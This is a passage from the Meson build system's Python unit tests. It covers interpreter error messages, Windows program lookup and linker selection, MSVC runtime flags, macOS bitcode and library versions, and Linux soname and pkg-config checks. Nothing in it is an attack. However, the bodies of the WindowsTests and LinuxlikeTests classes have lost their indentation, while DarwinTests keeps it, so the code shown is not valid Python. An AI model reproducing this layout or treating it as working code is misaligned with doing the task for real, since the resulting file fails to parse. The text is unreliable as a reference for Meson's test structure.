    def test_dependency_invalid_method(self):
        # Method calls valid only for some dependency kinds must raise on
        # other kinds.
        code = '''zlib_dep = dependency('zlib', required : false)
        zlib_dep.get_configtool_variable('foo')
        '''
        self.assertMesonRaises(code, ".* is not a config-tool dependency")
        code = '''zlib_dep = dependency('zlib', required : false)
        dep = declare_dependency(dependencies : zlib_dep)
        dep.get_pkgconfig_variable('foo')
        '''
        self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
        code = '''zlib_dep = dependency('zlib', required : false)
        dep = declare_dependency(dependencies : zlib_dep)
        dep.get_configtool_variable('foo')
        '''
        self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")

    def test_objc_cpp_detection(self):
        '''
        Test that when we can't detect objc or objcpp, we fail gracefully.
        '''
        env = get_fake_env()
        try:
            env.detect_objc_compiler(MachineChoice.HOST)
            env.detect_objcpp_compiler(MachineChoice.HOST)
        except EnvironmentException:
            code = "add_languages('objc')\nadd_languages('objcpp')"
            self.assertMesonRaises(code, "Unknown compiler")
            return
        raise unittest.SkipTest("objc and objcpp found, can't test detection failure")

    def test_subproject_variables(self):
        '''
        Test that:
        1. The correct message is outputted when a not-required dep is not
           found and the fallback subproject is also not found.
        2. A not-required fallback dependency is not found because the
           subproject failed to parse.
        3. A not-found not-required dep with a fallback subproject outputs the
           correct message when the fallback subproject is found but the
           variable inside it is not.
        4. A fallback dependency is found from the subproject parsed in (3)
        5. A wrap file from a subproject is used but fails because it does not
           contain required keys.
        '''
        tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
        stray_file = os.path.join(tdir, 'subprojects/subsubproject.wrap')
        if os.path.exists(stray_file):
            windows_proof_rm(stray_file)
        out = self.init(tdir, inprocess=True)
        self.assertRegex(out, r"Neither a subproject directory nor a .*nosubproj.wrap.* file was found")
        self.assertRegex(out, r'Function does not take positional arguments.')
        self.assertRegex(out, r'Dependency .*somenotfounddep.* from subproject .*subprojects/somesubproj.* found: .*NO.*')
        self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
        self.assertRegex(out, r'Missing key .*source_filename.* in subsubproject.wrap')
        windows_proof_rm(stray_file)

    def test_exception_exit_status(self):
        '''
        Test exit status on python exception
        '''
        tdir = os.path.join(self.unit_test_dir, '21 exit status')
        with self.assertRaises(subprocess.CalledProcessError) as cm:
            self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
        self.assertEqual(cm.exception.returncode, 2)
        self.wipe()

    def test_dict_requires_key_value_pairs(self):
        self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
                               'Only key:value pairs are valid in dict construction.')
        self.assertMesonRaises("{'foo': 'bar', 3}",
                               'Only key:value pairs are valid in dict construction.')

    def test_dict_forbids_duplicate_keys(self):
        self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
                               'Duplicate dictionary key: a.*')

    def test_dict_forbids_integer_key(self):
        self.assertMesonRaises("dict = {3: 'foo'}",
                               'Key must be a string.*')

    def test_using_too_recent_feature(self):
        # Here we use a dict, which was introduced in 0.47.0
        self.assertMesonOutputs("dict = {}",
                                ".*WARNING.*Project targeting.*but.*",
                                meson_version='>= 0.46.0')

    def test_using_recent_feature(self):
        # Same as above, except the meson version is now appropriate
        self.assertMesonDoesNotOutput("dict = {}",
                                      ".*WARNING.*Project targeting.*but.*",
                                      meson_version='>= 0.47')

    def test_using_too_recent_feature_dependency(self):
        self.assertMesonOutputs("dependency('pcap', required: false)",
                                ".*WARNING.*Project targeting.*but.*",
                                meson_version='>= 0.41.0')

    def test_vcs_tag_featurenew_build_always_stale(self):
        'https://github.com/mesonbuild/meson/issues/3904'
        vcs_tag = '''version_data = configuration_data()
        version_data.set('PROJVER', '@VCS_TAG@')
        vf = configure_file(output : 'version.h.in', configuration: version_data)
        f = vcs_tag(input : vf, output : 'version.h')
        '''
        msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
        self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')

    def test_missing_subproject_not_required_and_required(self):
        self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
                               "sub2 = subproject('not-found-subproject', required: true)",
                               """.*Subproject "subprojects/not-found-subproject" required but not found.*""")

    def test_get_variable_on_not_found_project(self):
        self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
                               "sub1.get_variable('naaa')",
                               """Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")

    def test_version_checked_before_parsing_options(self):
        '''
        https://github.com/mesonbuild/meson/issues/5281
        '''
        options = "option('some-option', type: 'foo', value: '')"
        match = 'Meson version is.*but project requires >=2000'
        self.assertMesonRaises("", match, meson_version='>=2000', options=options)

    def test_assert_default_message(self):
        self.assertMesonRaises("k1 = 'a'\n" +
                               "assert({\n" +
                               "  k1: 1,\n" +
                               "}['a'] == 2)\n",
                               r"Assert failed: {k1 : 1}\['a'\] == 2")

    def test_wrap_nofallback(self):
        self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
                               r"Dependency \'notfound\' not found and fallback is disabled",
                               extra_args=['--wrap-mode=nofallback'])

    def test_message(self):
        self.assertMesonOutputs("message('Array:', ['a', 'b'])",
                                r"Message:.* Array: \['a', 'b'\]")

    def test_warning(self):
        self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
                                r"WARNING:.* Array: \['a', 'b'\]")

    def test_override_dependency_twice(self):
        self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
                               "meson.override_dependency('foo', declare_dependency())",
                               """Tried to override dependency 'foo' which has already been resolved or overridden""")

    @unittest.skipIf(is_windows(), 'zlib is not available on Windows')
    def test_override_resolved_dependency(self):
        self.assertMesonRaises("dependency('zlib')\n" +
                               "meson.override_dependency('zlib', declare_dependency())",
                               """Tried to override dependency 'zlib' which has already been resolved or overridden""")

    def test_error_func(self):
        self.assertMesonRaises("error('a', 'b', ['c', ['d', {'e': 'f'}]], 'g')",
                               r"Problem encountered: a b \['c', \['d', {'e' : 'f'}\]\] g")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
    super().setUp()
    # All WindowsTests operate on the Windows-specific test case tree.
    self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
@mock.patch.dict(os.environ)
def test_find_program(self):
    '''
    Test that Windows-specific edge-cases in find_program are functioning
    correctly. Cannot be an ordinary test because it involves manipulating
    PATH to point to a directory with Python scripts.
    '''
    testdir = os.path.join(self.platform_test_dir, '8 find program')
    # Find `cmd` and `cmd.exe`
    prog1 = ExternalProgram('cmd')
    self.assertTrue(prog1.found(), msg='cmd not found')
    prog2 = ExternalProgram('cmd.exe')
    self.assertTrue(prog2.found(), msg='cmd.exe not found')
    # Both spellings must resolve to the same executable.
    self.assertPathEqual(prog1.get_path(), prog2.get_path())
    # Find cmd.exe with args without searching
    prog = ExternalProgram('cmd', command=['cmd', '/C'])
    self.assertTrue(prog.found(), msg='cmd not found with args')
    self.assertPathEqual(prog.get_command()[0], 'cmd')
    # Find cmd with an absolute path that's missing the extension
    cmd_path = prog2.get_path()[:-4]
    prog = ExternalProgram(cmd_path)
    self.assertTrue(prog.found(), msg=f'{cmd_path!r} not found')
    # Finding a script with no extension inside a directory works
    prog = ExternalProgram(os.path.join(testdir, 'test-script'))
    self.assertTrue(prog.found(), msg='test-script not found')
    # Finding a script with an extension inside a directory works
    prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
    self.assertTrue(prog.found(), msg='test-script-ext.py not found')
    # Finding a script in PATH
    os.environ['PATH'] += os.pathsep + testdir
    # If `.PY` is in PATHEXT, scripts can be found as programs
    if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
        # Finding a script in PATH w/o extension works and adds the interpreter
        prog = ExternalProgram('test-script-ext')
        self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
        self.assertPathEqual(prog.get_command()[0], python_command[0])
        self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
    # Finding a script in PATH with extension works and adds the interpreter
    prog = ExternalProgram('test-script-ext.py')
    self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
    self.assertPathEqual(prog.get_command()[0], python_command[0])
    self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
    # Using a script with an extension directly via command= works and adds the interpreter
    prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help'])
    self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=')
    self.assertPathEqual(prog.get_command()[0], python_command[0])
    self.assertPathEqual(prog.get_command()[2], '--help')
    self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
    # Using a script without an extension directly via command= works and adds the interpreter
    prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help'])
    self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=')
    self.assertPathEqual(prog.get_command()[0], python_command[0])
    self.assertPathEqual(prog.get_command()[2], '--help')
    self.assertPathBasenameEqual(prog.get_path(), 'test-script')
    # Ensure that WindowsApps gets removed from PATH
    path = os.environ['PATH']
    if 'WindowsApps' not in path:
        # Synthesize a WindowsApps entry if the environment lacks one.
        username = os.environ['USERNAME']
        appstore_dir = fr'C:\Users\{username}\AppData\Local\Microsoft\WindowsApps'
        path = os.pathsep + appstore_dir
    path = ExternalProgram._windows_sanitize_path(path)
    self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
    '''
    Test that find_library on libs that are to be ignored returns an empty
    array of arguments. Must be a unit test because we cannot inspect
    ExternalLibraryHolder from build files.
    '''
    testdir = os.path.join(self.platform_test_dir, '1 basic')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_argument_syntax() != 'msvc':
        raise unittest.SkipTest('Not using MSVC')
    # To force people to update this test, and also test
    self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
    for l in cc.ignore_libs:
        # Ignored libs resolve to no linker arguments at all.
        self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
    '''
    Test that dependencies of Windows resource files trigger rebuilds,
    both via compile_resources(depend_file:) and via generated depfiles.
    '''
    testdir = os.path.join(self.platform_test_dir, '5 resources')

    # resource compiler depfile generation is not yet implemented for msvc
    env = get_fake_env(testdir, self.builddir, self.prefix)
    depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}

    self.init(testdir)
    self.build()
    # Immediately rebuilding should not do anything
    self.assertBuildIsNoop()
    # Test compile_resources(depend_file:)
    # Changing mtime of sample.ico should rebuild prog
    self.utime(os.path.join(testdir, 'res', 'sample.ico'))
    self.assertRebuiltTarget('prog')
    # Test depfile generation by compile_resources
    # Changing mtime of resource.h should rebuild myres.rc and then prog
    if depfile_works:
        self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
        self.assertRebuiltTarget('prog')
    self.wipe()

    if depfile_works:
        # Repeat with resources produced by custom targets.
        testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
        self.init(testdir)
        self.build()
        # Immediately rebuilding should not do anything
        self.assertBuildIsNoop()
        # Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
        self.utime(os.path.join(testdir, 'res', 'resource.h'))
        self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
    '''
    Configure and build a project that requires C++17 with an MSVC-like
    compiler; skipped for any other compiler family.
    '''
    testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    compiler = env.detect_c_compiler(MachineChoice.HOST)
    if compiler.get_argument_syntax() != 'msvc':
        raise unittest.SkipTest('Test only applies to MSVC-like compilers')
    try:
        self.init(testdir)
    except subprocess.CalledProcessError:
        # A configure failure is tolerated here: CalledProcessError only
        # captures output with check_output(), which we do not use, so
        # there is no way to verify *why* setup failed.
        return
    self.build()
def test_install_pdb_introspection(self):
    '''
    Verify that `meson introspect --installed` lists the PDB debug file
    accompanying an installed executable when building with an MSVC-like
    compiler.
    '''
    testdir = os.path.join(self.platform_test_dir, '1 basic')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_argument_syntax() != 'msvc':
        raise unittest.SkipTest('Test only applies to MSVC-like compilers')
    self.init(testdir)
    installed = self.introspect('--installed')
    files = [os.path.basename(path) for path in installed.values()]
    # assertIn produces a far more useful failure message (it prints the
    # container) than the previous assertTrue('prog.pdb' in files).
    self.assertIn('prog.pdb', files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
    '''
    Shared helper: set the linker environment variable(s) for *lang* to
    *name* and assert that the detected compiler ends up using the
    linker whose id is *expected*.

    Skips when the linker binary or a compiler for *lang* is missing.
    '''
    if not shutil.which(name):
        raise unittest.SkipTest(f'Could not find {name}.')
    envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP[f'{lang}_ld']]
    # Also test a deprecated variable if there is one.
    if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP:
        envvars.append(
            mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld'])
    for envvar in envvars:
        # patch.dict restores os.environ when the block exits, so each
        # variable is tested in isolation.
        with mock.patch.dict(os.environ, {envvar: name}):
            env = get_fake_env()
            try:
                comp = getattr(env, f'detect_{lang}_compiler')(MachineChoice.HOST)
            except EnvironmentException:
                raise unittest.SkipTest(f'Could not find a compiler for {lang}')
            self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
    '''Selecting lld-link through the linker env var must be honored.'''
    env = get_fake_env()
    compiler = env.detect_c_compiler(MachineChoice.HOST)
    # GCC cannot drive MSVC-style linkers, so this scenario is moot there.
    if isinstance(compiler, mesonbuild.compilers.GnuLikeCompiler):
        raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
    self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
    '''Selecting MSVC link.exe through the linker env var must be honored.'''
    env = get_fake_env()
    compiler = env.detect_c_compiler(MachineChoice.HOST)
    # GCC cannot drive MSVC-style linkers, so this scenario is moot there.
    if isinstance(compiler, mesonbuild.compilers.GnuLikeCompiler):
        raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
    self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
    '''Selecting optlink through the linker env var must be honored.'''
    env = get_fake_env()
    compiler = env.detect_c_compiler(MachineChoice.HOST)
    # GCC cannot drive MSVC-style linkers, so this scenario is moot there.
    if isinstance(compiler, mesonbuild.compilers.GnuLikeCompiler):
        raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
    self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
    # Rust linker selection via the env var; no GnuLikeCompiler guard is
    # needed since rustc drives the linker itself.
    self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
    '''Selecting lld-link for D through the linker env var must work.'''
    env = get_fake_env()
    compiler = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
    # DMD hardcodes its linker choice, so skip it.
    if compiler.id == 'dmd':
        raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
    self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
    '''
    Release builds must produce PE binaries with a valid header checksum.
    Uses the third-party `pefile` module to inspect the produced DLL and
    EXE; skipped (outside CI) when the module is unavailable.
    '''
    try:
        import pefile
    except ImportError:
        # On CI the module is expected to be installed, so a missing
        # import there is a real failure rather than a skip.
        if is_ci():
            raise
        raise unittest.SkipTest('pefile module not found')
    testdir = os.path.join(self.common_test_dir, '6 linkshared')
    self.init(testdir, extra_args=['--buildtype=release'])
    self.build()
    # Test that binaries have a non-zero checksum
    env = get_fake_env()
    cc = env.detect_c_compiler(MachineChoice.HOST)
    cc_id = cc.get_id()
    ld_id = cc.get_linker_id()
    dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
    exe = os.path.join(self.builddir, 'cppprog.exe')
    for f in (dll, exe):
        pe = pefile.PE(f)
        # Include toolchain info in the message so failures identify the
        # compiler/linker combination at fault.
        msg = f'PE file: {f!r}, compiler: {cc_id!r}, linker: {ld_id!r}'
        if cc_id == 'clang-cl':
            # Latest clang-cl tested (7.0) does not write checksums out
            self.assertFalse(pe.verify_checksum(), msg=msg)
        else:
            # Verify that a valid checksum was written by all other compilers
            self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
    '''
    Test that qt5 dependencies use the debug module suffix when b_vscrt is
    set to 'mdd'
    '''
    # Verify that the `b_vscrt` option is available
    env = get_fake_env()
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if OptionKey('b_vscrt') not in cc.base_options:
        raise unittest.SkipTest('Compiler does not support setting the VS CRT')
    # Verify that qmake is for Qt5
    if not shutil.which('qmake-qt5'):
        # Outside CI a generic/mismatched qmake just skips; on CI the
        # checks are strict so misconfiguration is caught.
        if not shutil.which('qmake') and not is_ci():
            raise unittest.SkipTest('QMake not found')
        output = subprocess.getoutput('qmake --version')
        if 'Qt version 5' not in output and not is_ci():
            raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
    # Setup with /MDd
    testdir = os.path.join(self.framework_test_dir, '4 qt')
    self.init(testdir, extra_args=['-Db_vscrt=mdd'])
    # Verify that we're linking to the debug versions of Qt DLLs
    build_ninja = os.path.join(self.builddir, 'build.ninja')
    with open(build_ninja, encoding='utf-8') as f:
        contents = f.read()
        # Qt debug libraries carry a 'd' suffix (Qt5Cored.lib).
        m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
    self.assertIsNotNone(m, msg=contents)
def test_compiler_checks_vscrt(self):
    '''
    Verify that compiler sanity checks are run with the VS CRT matching
    the configured buildtype / b_vscrt option.
    '''
    # Bail out early when the compiler has no VS CRT concept at all.
    env = get_fake_env()
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if OptionKey('b_vscrt') not in cc.base_options:
        raise unittest.SkipTest('Compiler does not support setting the VS CRT')

    def sanitycheck_vscrt(vscrt):
        # Every recorded sanity-check command line must carry the flag.
        checks = self.get_meson_log_sanitychecks()
        self.assertTrue(len(checks) > 0)
        for check in checks:
            self.assertIn(vscrt, check)

    testdir = os.path.join(self.common_test_dir, '1 trivial')
    # Default configuration (debug buildtype) implies /MDd.
    self.init(testdir)
    sanitycheck_vscrt('/MDd')
    # Each remaining configuration gets a pristine build directory.
    configurations = [
        (['-Dbuildtype=debugoptimized'], '/MD'),
        (['-Dbuildtype=release'], '/MD'),
        (['-Db_vscrt=md'], '/MD'),
        (['-Db_vscrt=mdd'], '/MDd'),
        (['-Db_vscrt=mt'], '/MT'),
        (['-Db_vscrt=mtd'], '/MTd'),
    ]
    for extra_args, expected_crt in configurations:
        self.new_builddir()
        self.init(testdir, extra_args=extra_args)
        sanitycheck_vscrt(expected_crt)
def test_modules(self):
    '''Smoke-test configuring and building a C++ modules project.'''
    if self.backend is not Backend.ninja:
        raise unittest.SkipTest(f'C++ modules only work with the Ninja backend (not {self.backend.name}).')
    # VSCMD_VER is only set inside a Visual Studio command prompt.
    vscmd_ver = os.environ.get('VSCMD_VER')
    if vscmd_ver is None:
        raise unittest.SkipTest('C++ modules is only supported with Visual Studio.')
    if version_compare(vscmd_ver, '<16.10.0'):
        raise unittest.SkipTest('C++ modules are only supported with VS 2019 Preview or newer.')
    testdir = os.path.join(self.unit_test_dir, '86 cpp modules')
    self.init(testdir)
    self.build()
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
    '''
    Tests that should run on macOS
    '''

    def setUp(self):
        super().setUp()
        # All macOS-specific test projects live under test cases/osx.
        self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')

    def test_apple_bitcode(self):
        '''
        Test that -fembed-bitcode is correctly added while compiling and
        -bitcode_bundle is added while linking when b_bitcode is true and not
        when it is false. This can't be an ordinary test case because we need
        to inspect the compiler database.
        '''
        testdir = os.path.join(self.platform_test_dir, '7 bitcode')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.id != 'clang':
            raise unittest.SkipTest('Not using Clang on OSX')
        # Try with bitcode enabled
        out = self.init(testdir, extra_args='-Db_bitcode=true')
        # Warning was printed
        self.assertRegex(out, 'WARNING:.*b_bitcode')
        # Compiler options were added
        for compdb in self.get_compdb():
            # shared_module() sources must NOT get -fembed-bitcode;
            # every other source must.
            if 'module' in compdb['file']:
                self.assertNotIn('-fembed-bitcode', compdb['command'])
            else:
                self.assertIn('-fembed-bitcode', compdb['command'])
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        # Linker options were added
        with open(build_ninja, encoding='utf-8') as f:
            contents = f.read()
            m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
        self.assertIsNotNone(m, msg=contents)
        # Try with bitcode disabled
        self.setconf('-Db_bitcode=false')
        # Regenerate build
        self.build()
        for compdb in self.get_compdb():
            self.assertNotIn('-fembed-bitcode', compdb['command'])
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        with open(build_ninja, encoding='utf-8') as f:
            contents = f.read()
            m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
        self.assertIsNone(m, msg=contents)

    def test_apple_bitcode_modules(self):
        '''
        Same as above, just for shared_module()
        '''
        testdir = os.path.join(self.common_test_dir, '148 shared module resolving symbol in executable')
        # Ensure that it builds even with bitcode enabled
        self.init(testdir, extra_args='-Db_bitcode=true')
        self.build()
        self.run_tests()

    def _get_darwin_versions(self, fname):
        # Return (compatibility_version, current_version) for the built
        # library *fname* (relative to the build dir) as reported by otool.
        fname = os.path.join(self.builddir, fname)
        out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
        # The second line of `otool -L` output describes the library itself.
        m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
        self.assertIsNotNone(m, msg=out)
        return m.groups()

    @skipIfNoPkgconfig
    def test_library_versioning(self):
        '''
        Ensure that compatibility_version and current_version are set correctly
        '''
        testdir = os.path.join(self.platform_test_dir, '2 library versions')
        self.init(testdir)
        self.build()
        targets = {}
        for t in self.introspect('--targets'):
            # 'filename' may be a list (one per output) or a plain string.
            targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
        self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
        self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
        self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
        self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))

    def test_duplicate_rpath(self):
        testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
        # We purposely pass a duplicate rpath to Meson, in order
        # to ascertain that Meson does not call install_name_tool
        # with duplicate -delete_rpath arguments, which would
        # lead to erroring out on installation
        env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
        self.init(testdir, override_envvars=env)
        self.build()
        self.install()

    def test_removing_unused_linker_args(self):
        # Flags the compiler cannot consume should be filtered out rather
        # than breaking configuration.
        testdir = os.path.join(self.common_test_dir, '104 has arg')
        env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
        self.init(testdir, override_envvars=env)

    def test_objc_versions(self):
        # Objective-C always uses the C standard version.
        # Objective-C++ always uses the C++ standard version.
        # This is what most people seem to want and in addition
        # it is the only setup supported by Xcode.
        testdir = os.path.join(self.objc_test_dir, '1 simple')
        self.init(testdir)
        self.assertIn('-std=c99', self.get_compdb()[0]['command'])
        self.wipe()
        testdir = os.path.join(self.objcpp_test_dir, '1 simple')
        self.init(testdir)
        self.assertIn('-std=c++14', self.get_compdb()[0]['command'])
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
    '''
    Verify the soname embedded in a plain shared library. Needs to be a
    unit test because the check requires running `readelf` on the built
    binary.
    https://github.com/mesonbuild/meson/issues/785
    '''
    testdir = os.path.join(self.common_test_dir, '4 shared')
    self.init(testdir)
    self.build()
    built_lib = os.path.join(self.builddir, 'libmylib.so')
    self.assertEqual(get_soname(built_lib), 'libmylib.so')
def test_custom_soname(self):
    '''
    Verify the soname embedded in a shared library built with a custom
    name prefix and suffix. Needs to be a unit test because the check
    requires running `readelf` on the built binary.
    https://github.com/mesonbuild/meson/issues/785
    '''
    testdir = os.path.join(self.common_test_dir, '24 library versions')
    self.init(testdir)
    self.build()
    built_lib = os.path.join(self.builddir, 'prefixsomelib.suffix')
    self.assertEqual(get_soname(built_lib), 'prefixsomelib.suffix')
def test_pic(self):
    '''
    Static libraries must be compiled with -fPIC when b_staticpic=true
    and without it when false. Has to be a unit test since it inspects
    the compiler database.
    '''
    if is_windows() or is_cygwin() or is_osx():
        raise unittest.SkipTest('PIC not relevant')
    testdir = os.path.join(self.common_test_dir, '3 static')
    self.init(testdir)
    first_command = self.get_compdb()[0]['command']
    self.assertIn('-fPIC', first_command)
    # Flip the option and regenerate; the flag must disappear.
    self.setconf('-Db_staticpic=false')
    self.build()
    first_command = self.get_compdb()[0]['command']
    self.assertNotIn('-fPIC', first_command)
@mock.patch.dict(os.environ)
def test_pkgconfig_gen(self):
    '''
    Test that generated pkg-config files can be found and have the correct
    version and link args. This can't be an ordinary test case because we
    need to run pkg-config outside of a Meson build file.
    https://github.com/mesonbuild/meson/issues/889
    '''
    testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen')
    self.init(testdir)
    env = get_fake_env(testdir, self.builddir, self.prefix)
    kwargs = {'required': True, 'silent': True}
    # Point pkg-config at the .pc files generated into the private dir.
    # patch.dict on the method restores os.environ afterwards.
    os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
    foo_dep = PkgConfigDependency('libfoo', env, kwargs)
    self.assertTrue(foo_dep.found())
    self.assertEqual(foo_dep.get_version(), '1.0')
    self.assertIn('-lfoo', foo_dep.get_link_args())
    self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
    self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
    # A library-less package must yield no link or compile args.
    libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
    self.assertTrue(libhello_nolib.found())
    self.assertEqual(libhello_nolib.get_link_args(), [])
    self.assertEqual(libhello_nolib.get_compile_args(), [])
    self.assertEqual(libhello_nolib.get_pkgconfig_variable('foo', {}), 'bar')
    self.assertEqual(libhello_nolib.get_pkgconfig_variable('prefix', {}), self.prefix)
    # Escaped and unescaped variable values must round-trip correctly.
    self.assertEqual(libhello_nolib.get_pkgconfig_variable('escaped_var', {}), r'hello\ world')
    self.assertEqual(libhello_nolib.get_pkgconfig_variable('unescaped_var', {}), 'hello world')
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_id() in {'gcc', 'clang'}:
        for name in {'ct', 'ct0'}:
            ct_dep = PkgConfigDependency(name, env, kwargs)
            self.assertTrue(ct_dep.found())
            self.assertIn('-lct', ct_dep.get_link_args())
def test_pkgconfig_gen_deps(self):
    '''
    Test that generated pkg-config files correctly handle dependencies
    '''
    # First project generates the base .pc files...
    testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen')
    self.init(testdir)
    privatedir1 = self.privatedir
    self.new_builddir()
    # ...the second project consumes them while generating its own.
    testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen', 'dependencies')
    self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
    privatedir2 = self.privatedir
    env = {
        'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
        'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
    }
    self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
    # pkg-config strips some duplicated flags so we have to parse the
    # generated file ourself.
    expected = {
        'Requires': 'libexposed',
        'Requires.private': 'libfoo >= 1.0',
        'Libs': '-L${libdir} -llibmain -pthread -lcustom',
        'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
        'Cflags': '-I${includedir} -pthread -DCUSTOM',
    }
    if is_osx() or is_haiku():
        # -pthread is not a compile flag on these platforms.
        expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
    with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
        matched_lines = 0
        for line in f:
            parts = line.split(':', 1)
            if parts[0] in expected:
                key = parts[0]
                val = parts[1].strip()
                expected_val = expected[key]
                self.assertEqual(expected_val, val)
                matched_lines += 1
        # Every expected field must have appeared exactly once.
        self.assertEqual(len(expected), matched_lines)
    cmd = ['pkg-config', 'requires-test']
